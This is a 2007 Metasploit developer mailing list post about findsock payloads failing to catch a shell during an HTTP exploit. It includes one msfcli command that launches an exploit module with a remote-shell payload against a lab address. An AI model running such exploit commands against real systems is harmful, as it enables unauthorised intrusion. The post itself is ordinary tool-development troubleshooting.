Metasploit mailing list archives
Exploit::Remote::HttpClient and stages
From: nicob at nicob.net (Nicob)
Date: Mon, 26 Mar 2007 01:09:37 +0200
Le vendredi 09 mars 2007 ? 09:51 -0800, mmiller at hick.org a ?crit :
Let us know if you run into problems with this, since findsock payloads have thus far not been used all that much.
In one of my exploit, findsock payloads never work. When capturing the trafic, I see the cmd.exe prompt which is correctly sent back over the previously established connection and the "echo" test done by _check_shell(), but msfcli didn't "catch" the shell : ~> msfcli exploit/windows/http/xyz RHOST=192.168.201.128 RPORT=81 PAYLOAD=windows/shell/find_tag LHOST=192.168.201.1 E [*] Trying target XYZ ... [*] Sending stage (478 bytes) ~> Nicob
Current thread:
- Exploit::Remote::HttpClient and stages Olivier Dembour (Mar 09)
- Exploit::Remote::HttpClient and stages mmiller at hick.org (Mar 09)
- Exploit::Remote::HttpClient and stages H D Moore (Mar 09)
- Exploit::Remote::HttpClient and stages Olivier Dembour (Mar 11)
- Exploit::Remote::HttpClient and stages Nicob (Mar 25)
- Exploit::Remote::HttpClient and stages H D Moore (Mar 25)
- Exploit::Remote::HttpClient and stages mmiller at hick.org (Mar 09)